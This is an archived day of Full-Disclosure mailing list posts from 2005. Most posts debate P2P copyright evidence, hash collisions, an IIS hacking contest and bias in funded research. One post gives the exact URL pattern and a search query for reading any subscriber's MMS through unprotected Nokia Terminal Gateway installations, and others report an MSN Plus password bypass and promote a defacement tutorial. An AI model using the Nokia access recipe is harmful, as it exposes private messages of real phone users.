|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
extension:
|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Miracle Maker (miraclemaker_gsm
yahoo.com)
Date: Thu Apr 07 2005 - 05:26:16 CDT
Nokia Terminal Gateway (TGW) is a server application used to deliver
multimedia messages to users with GSM handsets that do not support MMS.
Nokia Terminal Gateway is used by about 90 GSM operators all over the world.
When somebody sends you a multimedia message and it is not delivered to
your handset withing 15 minutes or so, the message is forwarded to a
terminal gateway. Than you receive SMS with username and password. You
can read your MMS online using Nokia Terminal Gateway web interface.
Of course you have to type in these username and password. Also you can
create your online album and send multimedia messages from TGW.
The most interesting part is that in some TGW installations you do not
need username and password to access MMS.
Just type in the following and read the message delivered to subscriber
with phone number <MSISDN>:
//webnonsubscriber/nonsubscribermsisdnlogin.do?msisdn=http://<TGW_SERVER>/<LANG>/webnonsubscriber/nonsubscribermsisdnlogin.do?msisdn=<MSISDN>
Alternatively you can go to the following URL and type in the phone number:
//webnonsubscriber/msisdnlogin.jsp">http://<TGW_SERVER>/<LANG>/webnonsubscriber/msisdnlogin.jsp
In most cases <LANG> can be "en" for English.
To find a working <TGW_SERVER> you can search for "webnonsubscriber" in Google :-)
Best Regards,
miraclemaker_gsmyahoo.com
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Franckl - MobileBugtraq (francklmobilebugtraq.Com)
Date: Thu Apr 07 2005 - 06:25:14 CDT
MobileBugtraq is a new discussion mailing list about security of mobile terminals systems including all sorts of platforms. Topics of discussion might be related to hacking, protecting against break-ins, system bugs and exploits, etc.
The postings in this list may be written either in English.
To subscribe to the MobileBugtraq list, one should send an e-mail to: subscribemobilebugtraq.com
(just including in the main message body (no subject is needed): subscription)
After having subscribed, one might send messages to the MobileBugtraq List at the address: postmobilebugtraq.com
See you soon to talk about mobile security and share your knowledge.
Regards,
Franckl - http://www.mobilebugtraq.com - Symbian, 3G, Drm, Bluetooth, Java, Windows Mobile, and a lot of fun.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Dunceor . (dunceorgmail.com)
Date: Thu Apr 07 2005 - 08:49:01 CDT
Since I guess this organization represent the company that has
developed this software they should have the right to download the
software which doesn't mean they are doing something illegal just
because he is doing an illegal thing.
On Apr 7, 2005 5:48 AM, Thomas Sutpen <sutpengmail.com> wrote:
> On Apr 5, 2005 5:01 AM, Ag. System Administrator <sysadminagent.co.il> wrote:
> > More nice will be if this .iso file is just 451,486k of /dev/random junk.
> > Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
> > MD5? Something?
>
> The question that would begged to be asked is how they verified it.
> If they were to download copyrighted software from somebody sharing
> copyrighted software, does this not also constitute a crime? Is it
> not true that downloading illegally shared software is itself illegal?
> I'm not a lawyer, of course, but it's been my observation that the
> legal system doesn't often smile on those breaking the law to prove
> that others are breaking the law, unless it's in a Hollywood movie, no
> pun intended.
>
> Perhaps copyright makes some sort of concession for this. But it
> makes one wonder...
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: m0fo (editorsec.org.il)
Date: Thu Apr 07 2005 - 11:29:44 CDT
Title: MSN Plus Password Change Security Bypass Vulnerability
Risk: Medium
Date: 07.04.2005
Publisher: m0fo (editor at sec.org.il)
Source: http://sec.org.il/articles.php?a=187
Vendor: <http://www.msgplus.net> http://www.msgplus.net
MSN Plus is additional application for the MSN Messenger. Msn Plus is adding
a lot of options to the standart MSN Messenger.
One of the options is to lock your MSN Messenger with password you choose,
this way could be bypass easily because the password can be changed without
providing the old password.
all the msn plus password's protection could be bypass easily because the
vendor build it on the same way.
all the MSN Messngers and MSN Plus are vulnerable.
NOTE: successful exploitation requires that a user has logged in recently.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Adam Jones (ajones1gmail.com)
Date: Thu Apr 07 2005 - 11:23:31 CDT
If your read the full message that you were replying to you would see
that he addressed this issue in his reply. Vested interest and the
parties responsible for funding research have no consequence if:
1) The methods employed are fully documented.
2) The results are fully reproducable.
3) The methods are acceptable as an unbiased appraisal of the situation.
Provided those three things are true results are results, regardless
of funding. Demonstrating any one of those three to be false
constitutes EVIDENCE of vested interest. The conclusions of the study
do not.
To answer your (probably rhetorical) question: yes, I would trust the
results of smartcard research by the manufacturer if they can prove
the above three points to my satisfaction.
On Apr 6, 2005 9:06 AM, Michael Simpson <mikie.simpsongmail.com> wrote:
> would it have made any difference to the lancet making the decision to
> publish andrew wakefield's anti_MMR research if they had known that he
> was being paid by lawyers helping to sue the makers of the MMR vaccine
>
> yes, they wouldn't have published and we wouldn't be a mumps epidemic
> in britain.
>
> knowing that authors of a "scientific" report have a vested interest
> in a particular outcome is part of the process used for establishing
> the validity of the research
>
> would you trust your smartcard technology on the basis of a report
> funded totally by the manufacturers of said smart card or would you
> prefer some information that hasn't been potentially biased by greed?
>
> > Come on people grow up, put your prejudices aside and look at the
> > information provided, draw conclusions based on that, and be prepared to
> > change that opinion when the information to hand dictates.
>
> difficult to do without...wait for it...full-disclosure
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valdis.Kletnieksvt.edu
Date: Thu Apr 07 2005 - 13:18:57 CDT
On Thu, 07 Apr 2005 11:23:31 CDT, Adam Jones said:
> If your read the full message that you were replying to you would see
> that he addressed this issue in his reply. Vested interest and the
> parties responsible for funding research have no consequence if:
>
> 1) The methods employed are fully documented.
> 2) The results are fully reproducable.
> 3) The methods are acceptable as an unbiased appraisal of the situation.
Of course, in the real world, the important question is "How subtle were they
in slanting the question in order to get the answer they wanted?".
> To answer your (probably rhetorical) question: yes, I would trust the
> results of smartcard research by the manufacturer if they can prove
> the above three points to my satisfaction.
The problem is that it's often hard to directly map from "Is the research
valid?" (i.e. fulfilling your 3 points above) to "Is this research actually
applicable?". If the smartcard vendor runs a test that "proves card XYZ is
invulnerable to attacks A, B, and C", that probably means that it's suitable
for use in environments that only have those 3 attacks. If, however, your
environment also needs to survive attack D, and the test was designed to
not assess the strength against D because the vendor knew their card sucked
at stopping attack D, you may be dissapointed....
Remember - *most* of the sponsored research is "valid". However, most also
has been tweaked in the problem definition in order to slant the results - and
the challenge is determining if the tweaked definition is still applicable.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVXmPcC3lWbTT17ARAnfsAJ4vhKaiTrDWXECtYrLZQTYDQxMSMwCfbmWG
ZbVEPdg4CmguMghmJ8JzxtI=
=ChRg
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Bryan Loveless (Bryan.LovelessNAU.EDU)
Date: Thu Apr 07 2005 - 15:16:49 CDT
Here's your chance to shut up all those IIS people from saying it is secure.
(Or prove them right)
There is a contest to hack IIS, and the winner gets an XBOX, plus the pride
of saying that they have hacked an "impenetrable IIS environment."
http://www.hackiis6.com/
--Bryan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Thu Apr 07 2005 - 15:21:00 CDT
Dear Thomas Sutpen,
>> More nice will be if this .iso file is just 451,486k of /dev/random junk.
>> Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
>> MD5? Something?
The problem is much simpler, if 200 persons are sharing this ISO and if
it is confirmed to be a "pirated" version by downloading from ONE of
these users you can tell that the other 199 are also sharing the same
pirated versions, knowing that most (all) p2p applications use hashes to
identify the files. In other words, if 200 sources are listed all of
them are sharing the exact same file, at least if you trust the p2p
application code. (Which you can't proof does indeed work flawlessy
in this regards, but you get my point).
--
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Randall Perry (listsdomain-logic.com)
Date: Thu Apr 07 2005 - 15:28:53 CDT
But that's not quite real world.
Is the server running SQL server? Oracle?
Or is it just serving static pages and is sitting behind a reverse proxy
[on FreeBSD].
There aren't any details there.
Suppose no one cracks the box, that just means someone didn't want to spill
their guts for a retail Xbox.
I can suppose there are groups out there that would rather people assume it
'really is secure' regardless of critical flaws that are publicized and
regardless of the quiet black hats that aren't falling for an x-shaped carrot
Randy.
At 03:16 PM 4/7/2005, you wrote:
>Here's your chance to shut up all those IIS people from saying it is secure.
>(Or prove them right)
>There is a contest to hack IIS, and the winner gets an XBOX, plus the pride
>of saying that they have hacked an "impenetrable IIS environment."
>
>http://www.hackiis6.com/
>
>--Bryan
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
http://www.domain-logic.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Randall Perry (listsdomain-logic.com)
Date: Thu Apr 07 2005 - 15:41:52 CDT
At 03:21 PM 4/7/2005, you wrote:
>Dear Thomas Sutpen,
> >> More nice will be if this .iso file is just 451,486k of /dev/random junk.
> >> Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
> >> MD5? Something?
>The problem is much simpler, if 200 persons are sharing this ISO and if
>it is confirmed to be a "pirated" version by downloading from ONE of
>these users you can tell that the other 199 are also sharing the same
>pirated versions, knowing that most (all) p2p applications use hashes to
>identify the files. In other words, if 200 sources are listed all of
>them are sharing the exact same file, at least if you trust the p2p
>application code. (Which you can't proof does indeed work flawlessy
>in this regards, but you get my point).
No, it isn't quiet that clean.
The initial post was regarding eDonkey/eMule client.
The files are broken into chunks.
The files are 'verified' by a one-way hash.
By merely having a single chunk with the same hash is enough 'evidence'
that you are in complete possesion of that file.
(whether or not it is a successful full copy on your machine, they will
ONLY know if ALL sources came from ONLY YOU and they were able to rebuild
the entire ISO from all those chunks FROM ONLY YOU).
Otherwise, it is _possible_ to have a chunk with the same fingerprint and
make it appear that you have said chunk of their iso.
(of course a 256 or 512 string would be more accurate and less to chance of
being false positive).
It's like saying that a brown Brinks money bag was stolen from the bank.
You possess such a brinks money bag, but that doesn't mean it is theirs.
(those with cryptography experience can better explain than myself).
I am not very comfortable with this grey area being enough 'concrete'
evidence to condemn criminals.
What kind of computer training course do their attorneys even go through?
(or do they assume these hashes are 'fingerprints')
http://www.domain-logic.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Thu Apr 07 2005 - 16:28:59 CDT
Dear Randall Perry,
RP> The initial post was regarding eDonkey/eMule client.
RP> The files are broken into chunks.
RP> The files are 'verified' by a one-way hash.
RP> By merely having a single chunk with the same hash is enough 'evidence'
RP> that you are in complete possesion of that file.
You forget that emule/edonckey reports what chunks of a specific file a host
is serving (if you download). That might be 100% of the file, that
said you can "verify" the user has that specific file even without downlaoding.
(If you trust hashes, - emule and the edonkey protocol of course).
RP> (whether or not it is a successful full copy on your machine, they will
RP> ONLY know if ALL sources came from ONLY YOU and they were able to rebuild
RP> the entire ISO from all those chunks FROM ONLY YOU).
AFAIK, this is technicaly incorrect but may be correct in front of a
court (where you would have to proof it can't be otherwise).
RP> Otherwise, it is _possible_ to have a chunk with the same fingerprint and
RP> make it appear that you have said chunk of their iso.
That's *AFAIK* not possible, if this would be true the edonckey/emule
protocol would have a big design flaw and poeple couldn't even trade
millions of files every day, some (most?) downloads would be corrutped
as they could have potentialy downloaded a wrong chunk which in fact
is from another file.
RP> (of course a 256 or 512 string would be more accurate and less to chance of
RP> being false positive).
RP> It's like saying that a brown Brinks money bag was stolen from the bank.
RP> You possess such a brinks money bag, but that doesn't mean it is theirs.
RP> (those with cryptography experience can better explain than myself).
I am sorry, I am too long in the security field to still listen to
analogies ;) (No insult intended)
RP> (or do they assume these hashes are 'fingerprints')
Oh... well an one-way hash (Md5,sha etc) technicaly speaking
*IS* a fingerprint because it identifies a UNIQUE file. (collisions
possible but unlikely)
Please correct me if any of my assumptions above were incorrect.
--
Thierry Zoller
http://www.sniff-em.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Randall Perry (listsdomain-logic.com)
Date: Thu Apr 07 2005 - 16:48:52 CDT
>That's *AFAIK* not possible, if this would be true the edonckey/emule
>protocol would have a big design flaw and poeple couldn't even trade
>millions of files every day, some (most?) downloads would be corrutped
>as they could have potentialy downloaded a wrong chunk which in fact
>is from another file.
I came across this discussion:
http://forum.emule-project.net/lofiversion/index.php/t25107-150.html
..."Thats the point of file hashes. Emule doesn't work with file names for
anything apart from searches. It uses hashes. So they can say you have a
file with the same name and hash as one on e.g. sharereactor. Now that
makes it pretty clear that you are sharing the file (this is not conclusive
but makes it very likley,see my above post). In a criminal case you might
just get off (not beyond ALL resnable doubt) but in a civil case you are
screwed. "........
The opportunity for collisions causes 'reasonable' doubt. With all the
100's of terabytes being shared on P2P, I would imagine it quite possible
for a couple of hashes to match. (again, not concrete, but _possible_)
The problem is that such evidence admitted to court sets precedence for
plausible matches (as opposed to innocent until PROVEN beyond reasonable
doubt) to be presented as concrete fact. And I am not a P2P guy (except
BitTorrents of Fedora and Debian), but I am concerned about this mindset
for prosecution bleeding into digital signatures, encrypted emails (that
they cannot encrypt but see a string that resembles the characters 'I did
it' ).
Yeah, sorry about the analogies :)
http://www.domain-logic.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Mike Owen (kyphrosgmail.com)
Date: Thu Apr 07 2005 - 16:52:55 CDT
On Apr 7, 2005 2:28 PM, Thierry Zoller <Thierrysniff-em.com> wrote:
<snippage>
> RP> (or do they assume these hashes are 'fingerprints')
> Oh... well an one-way hash (Md5,sha etc) technicaly speaking
> *IS* a fingerprint because it identifies a UNIQUE file. (collisions
> possible but unlikely)
>
> Please correct me if any of my assumptions above were incorrect.
>
As reported over the last few months, MD5 is very broken. MD5
collisions are very easy to generate, with some reports of as little
as a few hours needed on reasonable hardware to generate a collision.
Here is a page with links to most of the various papers out, including
the Wang paper that started this all.
http://cryptography.hyperlink.cz/MD5_collisions.html
> --
> Thierry Zoller
> http://www.sniff-em.com
>
Mike
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Marc Maiffret (mmaiffreteeye.com)
Date: Thu Apr 07 2005 - 17:35:25 CDT
Has no one learned from these contests yet that they don't work, not
even for reasons of being a false way to test security, but because the
servers are never able to stay online for more than an hour because of
denial of service attacks.
The "funny" part is if the server gets DDoS'd then so will Windows IT
Pro magazine whom is hosting the hack server (now at least) on the same
subnet as their main website and with the same routes of course... Maybe
they can product test some Arbor networks gear while they are at it :-)
two for one.
Then again we did break our last xbox, so hmmmm
Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9329
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
Important Notice: This email is confidential, may be legally privileged,
and is for the intended recipient only. Access, disclosure, copying,
distribution, or reliance on any of it by anyone else is prohibited and
may be a criminal offense. Please delete if obtained in error and email
confirmation to the sender.
| -----Original Message-----
| From: full-disclosure-bounceslists.grok.org.uk
| [mailto:full-disclosure-bounceslists.grok.org.uk] On Behalf
| Of Bryan Loveless
| Sent: Thursday, April 07, 2005 1:17 PM
| To: full-disclosurelists.grok.org.uk
| Subject: [Full-disclosure] IIS hacking contest
|
| Here's your chance to shut up all those IIS people from
| saying it is secure.
| (Or prove them right)
| There is a contest to hack IIS, and the winner gets an XBOX,
| plus the pride of saying that they have hacked an
| "impenetrable IIS environment."
|
| http://www.hackiis6.com/
|
| --Bryan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Sumy (sanandresgmail.com)
Date: Thu Apr 07 2005 - 16:44:33 CDT
This is a full article about webserver defacements, Know your enemies
and their attack techniques to secure your webserver.All this
information is for educational Purpose ONLY, we are not responsable
for Misuse of any Document here.
Web Server Defacements
he urban art of grafitti has traversed to the online world in the form
of web server defacements. Just how do these online vandals do it
though? Read on to learn how it is done, and therefore gain a deeper
understanding which will help you defend against it.
There was a large commotion last year over the web server defacement
contest, which was to be held by various online miscreants. The act of
defacing a company's web site is one that has been going on for some
time now. In reality this has been practiced largely by the bottom
feeders of the internet community. To actually go out, and place your
own index.html file into a compromised web server does not take a
great deal of talent I assure you. Where the talent lies is with the
coder who discovered a web server exploit, and coded a way of
leveraging it in the first place. Once this exploit developer has
publicly released the code is when the script kiddies step in. What
the script kiddies lack in talent they make up for in numbers.
These types of attacks are relatively commonplace today. Personally
speaking I work in the network security industry, and have heard many
of my peers write off these attacks as "script kiddie" stuff. While I
would agree with them on that statement the problem is that these very
same peers of mine don't know how to do a web page defacement
themselves.
To defend you must learn to attack...
Full Article: http://www.exploitx.com/forum/azbb.php?1112907118
More articles & Tutorials? :
http://www.exploitx.com/forum/azbb.php?Tutorials_and_Articles
Security Portal: http://www.exploitx.com
Message Board: http://www.exploitx.com/forum
--
http://www.outwartips.net
http://www.exploitx.com
Please make a donation clicking on Our ads.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Thu Apr 07 2005 - 18:01:30 CDT
Dear Randall Perry,
RP> The opportunity for collisions causes 'reasonable' doubt. With all the
RP> 100's of terabytes being shared on P2P, I would imagine it quite possible
RP> for a couple of hashes to match. (again, not concrete, but _possible_)
RP> The problem is that such evidence admitted to court sets precedence for
RP> plausible matches (as opposed to innocent until PROVEN beyond reasonable
RP> doubt) to be presented as concrete fact. And I am not a P2P guy (except
RP> BitTorrents of Fedora and Debian), but I am concerned about this mindset
RP> for prosecution bleeding into digital signatures, encrypted emails (that
RP> they cannot encrypt but see a string that resembles the characters 'I did
RP> it' ).
You forget that the hash is not the only unique thing that specific file
has in common with the pirated file/material.
Calculate the following probability:
- The file/chunck has the same MD5 (or whatever HASH)
as the pirated material in question.
- The file has the EXACT same filename (if there would be a collission
how is the probability in mathametic terms that the file the
collission takes place has the exact same filename?)
- The file has the EXACT same size (The file has the EXACT same date
etc.pp)
I am sorry, but considering all these factors don't we have to conlude the
file is indeed THE file ? ;)
<Wild Speculation> Do the maths you probably get to a possibility which is equally likely
then a parental test based on DNA, which is accepted in some courts.</Wild Speculation>
--
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Poof (pooffansubber.com)
Date: Thu Apr 07 2005 - 18:11:26 CDT
Ahh, but what if said user is falsifying MD5sums with same size files in
order to help hinder piracy of said product?
In order to say that -I- am sharing Fedora.iso(Just an example.) you'd have
to download it and run it yourself. You can't just say that the MD5sum,
size, and name all match so it has to be the same product.
That's why if you wanted, you could sell bags of flour as cocaine and not be
charged with drug dealing. Fine, it looks the same and weighs the same,
however it isn't the product that's illegal. And to prove that it's illegal,
they need to test it.
You know what... I should just shut up. I always write sucky posts to FD.
~
> You forget that the hash is not the only unique thing that specific file
> has in common with the pirated file/material.
>
> Calculate the following probability:
>
> - The file/chunck has the same MD5 (or whatever HASH)
> as the pirated material in question.
> - The file has the EXACT same filename (if there would be a collission
> how is the probability in mathametic terms that the file the
> collission takes place has the exact same filename?)
> - The file has the EXACT same size (The file has the EXACT same date
> etc.pp)
>
> I am sorry, but considering all these factors don't we have to conlude the
> file is indeed THE file ? ;)
>
> <Wild Speculation> Do the maths you probably get to a possibility which is
> equally likely
> then a parental test based on DNA, which is accepted in some courts.</Wild
> Speculation>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Thu Apr 07 2005 - 18:14:35 CDT
Come on, people, get a clue.
The copyright owner has authorized the forensic investigators to download the infringing material. If it was there, according to a forensic investigator, then you have to prove it was not.
Please stop viewing the world as a level playing field populated by absolutes. By design, and by intent, the world is not a level playing field - if you are a consumer, a renter, and a worker then you are a slave to producers, owners, and employers.
Live with it, or don't, but to live while grossly misunderstanding it is truly absurd.
Regards,
Jason Coombs
jasoncscience.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: H D Moore (fdlistdigitaloffense.net)
Date: Thu Apr 07 2005 - 18:18:44 CDT
Marc,
I will buy you *two* Xbox's for a nice IIS 6.0 remote :-)
Seriously, the "market value" of a remote exploit for IIS 6.0 is
somewhere between two and twenty thousand dollars, depending on how
shady you want to get. These "find some 0day and give it to us"
challenges are a waste of a time in terms of product security, its just
blatent exploitation (the bad kind).
-HD
On Thursday 07 April 2005 17:35, Marc Maiffret wrote:
> The "funny" part is if the server gets DDoS'd then so will Windows IT
> Pro magazine whom is hosting the hack server (now at least) on the same
> subnet as their main website and with the same routes of course...
> Maybe they can product test some Arbor networks gear while they are at
> it :-) two for one.
>
> Then again we did break our last xbox, so hmmmm
>
> Signed,
> Marc Maiffret
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Zoller (Thierrysniff-em.com)
Date: Thu Apr 07 2005 - 18:25:42 CDT
Dear Jason Coombs,
JC> Come on, people, get a clue.
JC> The copyright owner has authorized the forensic investigators
JC> to download the infringing material.
JC> If it was there, according to
JC> a forensic investigator, then you have to prove it was not.
In what jurisidction? The world ? FD is certainly not US based. So
please with all due respect, the one who needs to get a clue is you.
At least in that part of the thread I posted to, we were discussing
technical issues, have nothing to say? Don't.
[CUT philosophical BLA BLA]
--
Regards,
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Anders Breindahl (skrewzskrewz.dk)
Date: Thu Apr 07 2005 - 18:33:37 CDT
Well, a friend of mine also got a mail like this once. This letter consisted
of approximately the same that yours did -- the difference being, that he had
never seen the file, nor heard of it.
I would tend to say that this -- if you believe me, again believing in my
trust to my friend -- makes your idea of their investigation methods
impossible?
I actually received your post to FD as a warning of an upcoming new wave of
spam... Or what ever annoying Internet-abuse is called in general terms.
Regards, Anders Breindahl.
On Friday 08 April 2005 01:10, Jason Coombs wrote:
> Come on, people, get a clue.
>
> The copyright owner has authorized the forensic investigators to download
> the infringing material. If it was there, according to a forensic
> investigator, then you have to prove it was not.
>
> Please stop viewing the world as a level playing field populated by
> absolutes. By design, and by intent, the world is not a level playing field
> - if you are a consumer, a renter, and a worker then you are a slave to
> producers, owners, and employers.
>
> Live with it, or don't, but to live while grossly misunderstanding it is
> truly absurd.
>
> Regards,
>
> Jason Coombs
> jasoncscience.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Ron DuFresne (dufresnewinternet.com)
Date: Thu Apr 07 2005 - 18:40:27 CDT
On Thu, 7 Apr 2005, Poof wrote:
[SNIP]
> That's why if you wanted, you could sell bags of flour as cocaine and not be
> charged with drug dealing. Fine, it looks the same and weighs the same,
> however it isn't the product that's illegal. And to prove that it's illegal,
> they need to test it.
>
Actually, at least in the US, there is a law <dang I forget what it's
called> that would make this illegal and subject one to prison time...
Thanks,
Ron DuFresne
--
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Thu Apr 07 2005 - 18:55:56 CDT
'Security' is ENTIRELY philosophical.
Go use a dictionary. You'll learn something.
Jason Coombs
jasoncscience.org
-----Original Message-----
From: Thierry Zoller <Thierrysniff-em.com>
Date: Fri, 8 Apr 2005 01:25:42
To:"Jason Coombs" <jasoncscience.org>
Cc:full-disclosurelists.grok.org.uk
Subject: Re: [Full-disclosure] Re: Case ID 51560370 - Notice of ClaimedInfringement
Dear Jason Coombs,
JC> Come on, people, get a clue.
JC> The copyright owner has authorized the forensic investigators
JC> to download the infringing material.
JC> If it was there, according to
JC> a forensic investigator, then you have to prove it was not.
In what jurisidction? The world ? FD is certainly not US based. So
please with all due respect, the one who needs to get a clue is you.
At least in that part of the thread I posted to, we were discussing
technical issues, have nothing to say? Don't.
[CUT philosophical BLA BLA]
--
Regards,
Thierry Zoller
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason (securitybrvenik.com)
Date: Thu Apr 07 2005 - 20:26:14 CDT
IANAL but it seems this thought process is broken.
Jason Coombs wrote:
> Come on, people, get a clue.
>
> The copyright owner has authorized the forensic investigators to
> download the infringing material. If it was there, according to a
> forensic investigator, then you have to prove it was not.
This position does not hold water, there is no way for them to not break
the same laws they would be attempting to enforce by performing the
investigation from a remote location and without a valid search warrant.
You do not have to prove that you did not have the content, you only
have to prove that you have content that appears very similar to the
remote reviewer.
If you were to place a copyrighted work of your own there then would
they be forced to download it and break the law in order to prove that
it was not the other copyright owners property? If they show in the logs
as having attempted a download does this make them guilty?
It is as simple as creating a server that will return filenames and
hashes found on the network but actually provide /dev/random for the
download or your copyrighted content with an engineered hash collision.
It only takes one case to prevent the civil suit from being filed. To
file the suit would be admitting to having broken the law. You cannot
bring suit when the basis of the suit is itself illegal activity.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: AJ C (spook3y3sgmail.com)
Date: Thu Apr 07 2005 - 21:48:04 CDT
Civil vs Criminal cases dude, you're imposing some aspects of criminal
cases upon civil proceedings and that's not how they work. In a
criminal trial it's a dramatized version of reasonable doubt, civil
proceedings must show 51%+ responsibility on the part of the defendant
(much, much easier and why the powers that be choose this route). Not
to mention it's their content (no harm, no foul on downloading
something they already own) and MPAA/RIAA/blah have set precedence for
proactively tracking (either themselves or appointed parties)
file-sharing events (method of access is not unlawful and cannot be
brought into contention...is BitTorrent inherently illegal when used
for legit purposes? -- nope).
If bb knocks on your door then you argue evidentiary process otherwise
in a civil proceeding you bear more of a burden to show you *didn't*
do what they're claiming (right or wrong they do have the legal upper
hand with their records versus essentially a verbal denial at best).
'Probably just easier to not download the crap and stay off the radar, $0.02.
On Apr 7, 2005 7:26 PM, Jason <securitybrvenik.com> wrote:
> IANAL but it seems this thought process is broken.
>
> Jason Coombs wrote:
> > Come on, people, get a clue.
> >
> > The copyright owner has authorized the forensic investigators to
> > download the infringing material. If it was there, according to a
> > forensic investigator, then you have to prove it was not.
>
> This position does not hold water, there is no way for them to not break
> the same laws they would be attempting to enforce by performing the
> investigation from a remote location and without a valid search warrant.
> You do not have to prove that you did not have the content, you only
> have to prove that you have content that appears very similar to the
> remote reviewer.
>
> If you were to place a copyrighted work of your own there then would
> they be forced to download it and break the law in order to prove that
> it was not the other copyright owners property? If they show in the logs
> as having attempted a download does this make them guilty?
>
> It is as simple as creating a server that will return filenames and
> hashes found on the network but actually provide /dev/random for the
> download or your copyrighted content with an engineered hash collision.
>
> It only takes one case to prevent the civil suit from being filed. To
> file the suit would be admitting to having broken the law. You cannot
> bring suit when the basis of the suit is itself illegal activity.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
AJC
spook3y3sgmail.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason (securitybrvenik.com)
Date: Thu Apr 07 2005 - 22:15:38 CDT
